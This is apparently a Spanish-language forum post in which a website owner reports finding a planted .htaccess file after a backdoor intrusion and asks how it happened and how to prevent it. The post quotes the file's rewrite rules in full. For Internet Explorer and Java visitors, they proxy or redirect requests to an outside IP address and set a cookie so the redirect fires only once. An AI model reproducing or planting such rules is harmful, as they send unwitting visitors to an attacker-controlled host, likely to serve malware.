Bueno primera vez que me pasa esto. Me aparecio en el hosting un archivos llamado ".htaccess-ic" que tenia el siguiente codigo..
Código PHP:
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^Mozilla/4(.*)MSIE [OR]
RewriteCond %{HTTP_USER_AGENT} Java
RewriteRule Index/(.*) http://109.236.81.64/$1 [P,L]
<FilesMatch "\.(html|htm|php|shtml|asp|aspx|jsp)$">
RewriteEngine On
##
RewriteCond %{HTTP_COOKIE} !^.*client.*$
RewriteCond %{HTTP_USER_AGENT} ^Mozilla/4(.*)MSIE
RewriteRule .* http://%{HTTP_HOST}/Index/index.php [R,L]
##
Header set Set-Cookie: "client=done;path=/;"
</FilesMatch>
El cual me hizo desaparecer el "header" y "footer" de toda la web. Esto fue puesto a las 3am. Lo elimine y se arreglo el problema, creo que no le funciono totalmente a esta persona porque por lo que lei, esto tendria que haber redireccionado la web completamente a otra web pero solo la hizo funcionar mal. Eliminando los "includes".
Este ataque fue atravez de un "backdoor" .
Como paso esto? y como puedo prevenirlo?
Gracias